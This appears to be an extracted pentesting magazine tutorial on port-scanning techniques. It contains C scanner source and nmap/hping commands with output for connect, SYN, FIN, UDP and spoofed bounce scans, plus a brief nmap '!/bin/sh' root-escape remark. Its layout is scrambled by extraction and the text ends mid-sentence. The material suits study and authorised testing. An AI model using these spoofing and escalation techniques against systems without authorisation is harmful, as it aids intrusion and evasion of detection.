
http://pentestmag.com

Listing 1. Basic connecting program written in C for Linux
/*
* connect-scan.c
*
* Fast connect scanner written for demonstration only, this is for educational purposes only
*
* Copyright 2003(C) Enrique Alfonso Sanchez Montellano
* <[email protected]>
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <getopt.h>
uint32_t resolve (char *serv) {
struct sockaddr_in sinn;
struct hostent *hent;

}

hent = gethostbyname (serv);
if(!hent) return 0;
bzero ((char *) &sinn, sizeof (sinn));
memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
return sinn.sin_addr.s_addr;

int connect_2_port(uint32_t victim, u_long port) {
int sockfd;
struct sockaddr_in hostaddr;
fprintf(stderr, "Trying port %d\t\t", port);
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
fprintf(stderr, "Cannot allocate socket\n");
return -1;
}
hostaddr.sin_port = htons(port);
hostaddr.sin_addr.s_addr = victim;
hostaddr.sin_family = AF_INET;
if((connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr))) != 0) {
fprintf(stderr, "Closed port\n");
}
else {
fprintf(stderr, "Open port\n");
}
close(sockfd);
return 0;

StartKit 01/2013(01)

Page 33

http://pentestmag.com

PENTESTING WITH TOOLS
}
void usage(char *name) {
fprintf(stderr, "Usage: %s -h <host> -s <start port> -e <end port>\n", name);
fprintf(stderr, "\th: Host to scan\n");
fprintf(stderr, "\ts: start port (default is 1)\n");
fprintf(stderr, "\te: end port (default is 6000)\n");
fprintf(stderr, "Bugs and comments to [email protected]\n\n");
exit(0);
}
int main(int argc, char **argv) {
int start_port = 1, end_port = 6000;
int option, i;
char *victim;
uint32_t resolved_addie;
if(argc < 2) {
usage(argv[0]);
}
while((option = getopt(argc, argv, "h:s:e:")) != EOF) {
switch(option){
case 'h':
victim = optarg;
break;
case 's':
start_port = atoi(optarg);
if((start_port < 0) || (start_port > 65535)) {
fprintf(stderr, "Negative or bigger than actual ports detected setting to 1\n");
start_port = 1;
}
break;
case 'e':
end_port = atoi(optarg);
if((end_port < 0) || (end_port > 65535) || (end_port < start_port)) {
fprintf(stderr, "Weird stuff going on, either end port negative, over 65535 or lower than
start port ... setting to port 2\n");
end_port = 2;
}
break;
}
}
resolved_addie = resolve(victim);
for(i = start_port; i <= end_port; i++) {
connect_2_port(resolved_addie, i);
}
}

return 0;

StartKit 01/2013(01)

Page 34

http://pentestmag.com

number of it, is the number the host will refer to, it
enable to tell from which connection it comes and
if it’s on the order or is missing.
An example of a TCP connection is the next: A
client (C) sends a synchronize packet to the server (S) to initiate a connection, this packet contains
a number to synchronize with (C(syn)), then the
Server replies with the number the server will use
to start the connection and an acknowledge of the
first packet being received with the number the
client send + 1 (S(syn/C(ack + 1))), at the end
the client sends an acknowledge packet with the
number the server send + 1 (C(S(ack + 1))). This
is to synchronize and have the number straight,
this way if packet 3 arrives before packet 2 the
receiver waits for packet 2 and if times out it can
send a packet asking for packet 2 again to be
able to have the connection in the right order and
complete.
This is called the “3 way handshake”. This is a
very important process to understand, since some
techniques are based on the way TCP handles
connections and on how different operating systems have implemented this.
The majority of people I encounter do not realize that being able to sniff a network is not a good
thing, not only because you can see passwords
all over the place, but because you can take over
connections. After after the connection is done, the
only thing is that packets increment by 1 to be able
to refer to them, so when you see passing packet
1 and 2, you know that packet 3 is coming. And,
if the attacker manages to send packet 3 before
the real connection, it can take over the connection due to the fact that it is not synchronized. The
receiver sees that packet 3 has already been received and thinks it is a delay or a repeat and silently drops it.

A lot of things can be done with badly implemented TCP/IP Stacks on operating systems and we
will see some of them on this article.

Types of Scans

Connectivity Scan

This type of scan requires that the whole 3-way
TCP connection is established and uses normal
sockets; this means you don’t need super user
privileges to be able to run this scan and that any
user can do it, this is usually logged even on the
host due to the fact that you have to complete the
whole connection.
Writing a socket scanner is very easy, we are reinventing the wheel right now, but for sake of technicality, we are going to write our own fast socket
scanner (Listing 1).
The function resolve() executes a gethostbyname and stores it into a sockaddr_in structure for
further use and connections, this is a fairly generic
function that can be reused in other programs, so
is a good idea to either have it in a separate C file
in case of multiple projects or in case of a bigger
project by just design to be able to maintain it. But
our scanner is fairly small and for readability we
have it within our code (Listing 2).
Nextly, the function connect_2_port() does the
actual connection, this is done by taking the result
of the resolve function and the port and creating
a socket, filling the correct information (Listing 3).
As you can see, writing a fast scanner based on
sockets and pure connection is easy, you can also
use “canned tools” such as nmap (great scanner
and the industry standard): Listing 4.
As the reader can see, nmap gathers and shows
more information than our scanner, if you want to
add the services you can parse the /etc/services
file and add it up, but if you are writing your own

Listing 2. Function to resolve into a sockaddr_in structure the IP Address or hostname given
uint32_t resolve (char *serv) {
struct sockaddr_in sinn;
//structure to fill out with the result of gethostbyname()
struct hostent *hent;
hent = gethostbyname (serv); // We execute gethostbyname()
if(!hent) return 0;
// If we could not resolve we return 0
bzero ((char *) &sinn, sizeof (sinn));
memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
return sinn.sin_addr.s_addr; // Else we return the resolved address as a unsigned int
}

StartKit 01/2013(01)

Page 35

http://pentestmag.com

PENTESTING WITH TOOLS
scanner, you probably know a couple of most used
ports don’t you? This type of scan as it was said
before, is usually really dirty and even the host
logs it sometimes (in the case of using wrappers)
so expect your IDS to go bananas as soon as you
run the port scanners with this option.

SYN Scan

In this type of scan, the connection is not finished,
rather a RST is sent instead of sending the last

part of the 3 way handshake, this means a SYN
gets sent, then a SYN/ACK gets received but a
RST is being sent instead of the ACK.
This type of port scan is not logged by the host
(unless you have a host based IDS in which case
is the IDS that is logging not really the host anyway), this port scan used to be logged on kernel
2.0.X, since there was a bug in which you accepted really fast, but the bug was fixed so it doesn’t
get logged anymore.

Listing 3. connect_2_port function
int connect_2_port(uint32_t victim, u_long port) {
int sockfd;
struct sockaddr_in hostaddr;
fprintf(stderr, "Trying port %d\t\t", port);
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { //Create socket
fprintf(stderr, "Cannot allocate socket\n");
return -1;
}
hostaddr.sin_port = htons(port);
hostaddr.sin_addr.s_addr = victim;
hostaddr.sin_family = AF_INET;

// Fill out the port we are going to connect
// Fill out the address where is going to connect

if((connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr))) != 0) {
fprintf(stderr, "Closed port\n");
}
else {
fprintf(stderr, "Open port\n");
}

}

close(sockfd);
return 0;

Listing 4. nmap output for a Full connect scan
nahual@fscking:~$ nmap -sT -n 127.0.0.1 //We are going to scan ourselves to make it fast
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port
State
Service
22/tcp
open
ssh
111/tcp
open
sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
nahual@fscking:~$

StartKit 01/2013(01)

Page 36

http://pentestmag.com

This is one of the most widely used methods of
scanning, it’s faster than the other one, since you
don’t really have to wait for the connection to finish
to realize that the port is open, as soon as you get
a SYN/ACK you know the port is open and add it
up on the opened ports. You can use nmap; in this
case you would have to use the –sS option instead
of the –sT option to gather the information: Listing 5.

What happened? This type of scan requires root,
since you have to open raw sockets to be able to
close them in a different way or even just not complete the connection by spoofing the packets all
the way and not having the kernel fill most of the
stuff up.
I wouldn’t recommend making nmap suid, since
it could potentially have bugs which could be ex-

Listing 5. Nmap execution os SYN scan without root privileges
nahual@fscking:~$ nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
You requested a scan type which requires r00t privileges, and you do not have them.
QUITTING!
nahual@fscking:~$

Listing 6. Nmap output of SYN scan
nahual@fscking:~$ su Password: //Type root’s password here
If there was in justice in the world, "trust" would be a four-letter word.
root@fscking:~# nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port
State
Service
22/tcp
open
ssh
111/tcp
open
sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
root@fscking:~#

Listing 7. hping sending SYN packets to a closed port
root@fscking:~# hping -S -p 130 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=0
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=1
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=2
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=3

bytes
win=0
win=0
win=0
win=0

rtt=0.5
rtt=0.2
rtt=0.1
rtt=0.2

ms
ms
ms
ms

--- 127.0.0.1 hping statistic --4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#

StartKit 01/2013(01)

Page 37

http://pentestmag.com

PENTESTING WITH TOOLS
Listing 8. hping sending SYN packets to an open port
root@fscking:~# hping -S -p 22 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers +
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA

0 data bytes
seq=0 win=32767
seq=1 win=32767
seq=2 win=32767
seq=3 win=32767

rtt=1.7
rtt=0.3
rtt=0.3
rtt=0.2

ms
ms
ms
ms

--- 127.0.0.1 hping statistic --4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.6/1.7 ms
root@fscking:~#

Listing 9. hping sending one packet to each port and incrementing after each packet
root@fscking:~# hping -S -p ++ 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.1 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.7 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms
--- 127.0.0.1 hping statistic --26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.2/0.7 ms
root@fscking:~#

StartKit 01/2013(01)

Page 38

http://pentestmag.com

ploited (In older versions if nmap was suid you
could just nmap --interactive then just !/bin/sh
your way into root) so su or sudo into root account
and try again the scan: Listing 6.
By now, you must be wondering why I’m using
the –n option and not saying anything about it, the
–n option is to have the program not resolve the
IP address or name (even as weird as it sounds)
while trying to print it, meaning it will not resolve localhost to 127.0.0.1. Then, try to resolve 127.0.0.1
back to print it out, this would take more time, and
we are not going to waste any time on that!
But using canned tools without knowing how
they work in the back is not that good, is not fun,
and in complex scenarios it might even get you in
trouble. We are going to use one of my favorite
tools: hping.
Hping is coded by Salvatore Sanfilippo (antirez)
and you can find on http://www.kyuzz.org/antirez/hping2.html or just apt-get install on a debian
based distribution (Kali, formerly known as backtrack already contains hping). This tool will let us
create packets with options as we wish, without
having to code an entire packet creator ourselves,
so we port scan the same machine with hping. To
run hping, you need to be root, and read some

of the options, this is not as “clean” as nmap that
gives you everything already processed, but that
would be because hping creates packets, sends
them and shows you the response so the interpretation is left to the user, this one is more flexible and you can read it for yourself. Some options
are going to be discussed here and some won’t.
Check your man page for more details.
Hping can take a huge amount of options, the
most important ones are:
• -S: Tells hping to add the SYN flag into the
TCP packet
• -A: Tells hping to add the ACK flag into the
TCP packet
• -r: Tells hping to make the increment ID of the
packet relative
• -a: Tells hping to spoof the address which is
written right after the option as if it was sent
from that particular address
• -p: Destination port for the packet
• -i: interval in which to send the packets (if we
use u is microsenconds)
Now let’s see how a closed port looks like in
hping: Listing 7.

Listing 10. hping sending SYN packets with grep open ports
root@fscking:~# hping -S -p ++ 127.0.0.1 -i u1000 | grep SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.2 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=111 flags=SA seq=111 win=32767 rtt=0.1 ms
--- 127.0.0.1 hping statistic --810 packets tramitted, 810 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.7 ms
root@fscking:~#

Listing 11. nmap executing a FIN scan
root@fscking:~# nmap -sF -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port
State
Service
22/tcp
open
ssh
111/tcp
open
sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
root@fscking:~#

StartKit 01/2013(01)

Page 39

http://pentestmag.com

PENTESTING WITH TOOLS
If we read on the line and search for flags, we
get the flags that the returned packet has which
are RA, R for RST and A for ACK, this means that
the server got the SYN packet (because of the
ACK) but the port is closed (is not offering any
services) since we have the R flag turned on. Another nice indication is the fact that the window
size for the port is 0, saying you cannot send a
maximum amount of data in that port (since its
closed of course!).
If the port is open the result would look like this:
Listing 8.
The reader can see how the flags section has
changed from RA to SA, this meaning SYN for
the S and A for the ACK, meaning the port is
open, the window size is also something different

that 0, meaning you can send data trough that
port. But doing one line of command each port
and reading everything can be trying, how can I
send to each port? We use the –p option with ++:
Listing 9.
We can see that the sport is giving us the destination port for the server. Also, we can see that
all ports, apart from port 22 is opened since is the
one that has the SA and the window size different
than 0.
To make it faster and less complicated to read,
we can use grep and the –i option: Listing 10.
We sent 810 packets but used grep to only print
the SA flags, meaning we only want the opened
ports, we get the same result as the other scans:
port 22 and port 111 are opened.

Listing 12. hping used to execute a FIN scan
root@fscking:~# hping -F 127.0.0.1 -p ++
HPING 127.0.0.1 (lo 127.0.0.1): F set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.2 ms
//Hey port 22 is gone!
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms
--- 127.0.0.1 hping statistic --26 packets tramitted, 25 packets received, 4% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#

StartKit 01/2013(01)

Page 40

http://pentestmag.com

FYN Scan

FYN Scan is a scan in which you send a packet
with FYN, meaning is the end of the connection, in
which case the server will not respond to the packet
but silently drop the connection, with FYN the connection is read with out of band data and terminates
nicely, which is different with RST which reads no
out of band data just drops the connection.
This type of scan is used to bypass simple SYN
filtering firewalls, one of the tricks about this is that
open ports do not respond since they have to silently read the packet and not answer to it. In which
case if the FYN packets are filtered in the firewalls
all the ports will look opened! Using nmap we get
the same results as the other scans: Listing 11.
We cannot discern what is going on in here since
everything is done for us by the program, so we
use hping to see the results of sending packets to
the server: Listing 12.

As you ca see by the comment port 22 is not
printed, the packet is lost, this means that port 22
is opened since it has to drop it after processing it
silently.
This type of scan is pretty much like SYN scan so
this part should be short, just remember that in a
FYN scan opened ports do not respond.
Warning Windows does not respond as the RFC
requires (what a surprise!) so it replies with RA,
showing on the scanners and as you read that all
the ports are closed.

Bounce Scanning

By now all the IDS in your network should be
screaming hacker all over he place with your IP
showing in every log, remember I said this are not
really stealth scans, now up to the stealth part of
scanning.

Listing 13. hping sending SYN/ACK packets to a host
root@fscking:~# hping -S -A -r -n 192.168.132.1 -p 100
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=16133 sport=100 flags=R seq=0 win=0 rtt=17.0 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=1 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=4 win=0 rtt=0.3 ms
--- 192.168.132.1 hping statistic --5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.3/3.6/17.0 ms
root@fscking:~#

Listing 14. hping sending SYN/ACK packets to a host
root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=20058 sport=130 flags=R seq=0 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.3 ms
And the count just keeps on going but for the sake of brevity I will not put everything here!

Listing 15. hping sending SYN packets with fake address to a host
root@fscking:~# hping -S -a 192.168.132.1 -p 80 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes
Program seems to hang in here, look at the other terminal

StartKit 01/2013(01)

Page 41

http://pentestmag.com

PENTESTING WITH TOOLS
Some years ago a way to bounce scan trough
windows machines and routers was published.
Due to the fact that windows TCP/IP stack is so
overwhelming in complexity, it can be used to read
the RST ID numbers and fake packets from that
host to the victim. By using the windows/router
host RST ID increment, the real IP address of the
attacker is hidden from the victim.
Windows RST id increments by 1 while not being really pushed with traffic, meaning the TCP/IP
stack increments by 1 not randomly like the other
OS, giving us the opportunity to spoof the connection nicely and getting some nice results:
So when you send a packet and it gets RST, the
id increments sequentially: Listing 13.
Using the –r option we can see the increment on
the id is +2, meaning the first one was 16133 but
the second one was id of that packet minus the id
before it (16135 – 16133 = 2), but the increment is
sequential giving us the opportunity of spoofing the
connection.
Now imagine a network like this: Figure 1.

Figure 1. Steps taken for a bounce scan

If you start pulling the RST id from the spoofed
machine, you can see that it increments by 1 each
time; now the attacker sends a spoofed SYN packet which looks like it’s coming from the spoofed
machine and goes to the victim, as soon as the victim responds with the appropriate SYN/ACK packet the spoofed machine is going to RST it, why?
Because it did not initiate the connection so is not
on it’s table, it resets the connection and of course
that has a RST id on it. Next time we check send
the SYN/ACK packet to pull for the RST id from
the spoofed machine the increment is not going
to be 1 but 2, since it already sent another RST to
the victim, giving us that the port we spoofed to is
open.
You cannot RST a RST packet, so it the port is
closed the spoofed machine will get a RST packet
StartKit 01/2013(01)

by the victim dropping it silently and not incrementing the RST id. This way if we pull the RST id constantly while sending spoofed packets to the victim
we can know which ports are opened.
The firewall and the IDS on victim are going to
think the scan if coming from the spoofed machine,
there goes your very expensive IDS, giving the attacker the appearance of coming from different
hosts at the same time and of course if the tool is
networked right it will look as normal traffic or virus
traffic.
For this type of scan you need 2 shells if they are
possible next to each other or at least visible at the
same time, on the first one we are going to start puling the RST id to a windows machine: Listing 14.
Warning Note
You do not need that port to be opened since you
want the RST not a SYN/ACK. That should make
it really hard to find, a non firewalled windows machine in the internet with low traffic, something
hard to find huh?
When you are ready, the next command will send
a lot of packets to the victim machine spoofing it
as the windows machine (you don’t get any output
from this command): Listing 15.
If the port is opened, you will notice an increment
on the id, in my case port 80 is not opened so nothing happens (victim is RST; Listing 16).
Try to guess in which line I typed the command
and started to send the spoofed packets to port 22
with the next command: Listing 17.
As you can see, the RST id is incremented to
102 and stayed there. As soon as I hit ctrl-C to stop
sending packets, the id went down to +2 again.
This tells me that this port is open and is leaving
logs as the windows machine, very nice and easy
to do, although it is really hard to do it one port at
the time right? A bounce scan can be downloaded
at http://www.security-dojo.com/code/bscan.c.

UDP Scan

Some services run under the User Datagram
Protocol since they need bigger data window
and they are not oriented to connectivity (such
as mountd, nfsd and other). This services have
their ports assigned and since it is another protocol, the ports can be the same as TCP but not
the service! A very used service that uses UDP is
the nameserver service, which runs under port 53
UDP (and TCP) resolving requests go under UDP
by default.

Page 42

http://pentestmag.com

How do we know the UDP port is open? Because
by RFC it should not respond and if its closed it
should send an ICMP Port Unreachable if it’s
closed, so we can write our own scanner based on
that, let’s see an example using hping (Listing 18).
Port 53 (domain) is closed on the machine so it
returns ICMP Port Unreachable since the service

is not there, port 111 (sunrpc) is open so it returns
nothing, remember UDP is a connectionless protocol so every packet is assumed to have data that
is to be used on the connection. You can use a
canned tool such as nmap and the results would
be like this: Listing 19. As you can see the results
are the same, you could use hping to scan the en-

Listing 16. hping sending SYN/ACK packets to a windows host
root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=21078 sport=130 flags=R seq=0 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=5 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=6 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=7 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=8 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=9 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=10 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=11 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=12 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=13 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=14 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+6 sport=130 flags=R seq=15 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+123 sport=130 flags=R seq=16 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=17 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=18 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=19 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=20 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=21 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+59 sport=130 flags=R seq=22 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=23 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=24 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=25 win=0 rtt=0.3 ms
--- 192.168.132.1 hping statistic --26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.3/0.5 ms
root@fscking:~#

Listing 17. hping sending SYN packets with fake address to a host
root@fscking:~# hping -S -a 192.168.132.1 -p 22 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes
--- 192.168.132.2 hping statistic --619 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

StartKit 01/2013(01)

Page 43

http://pentestmag.com

PENTESTING WITH TOOLS
tire range using the –p ++ option or even use our
own UDP scanner

Conclusion

This article covers a lot of code and not a lot on writing (which was fun for me), there is not a lot new to
say on scanning. Having knowledge of what happens behind the network scanners such as nmap
helps a lot, if you don’t understand why you get a
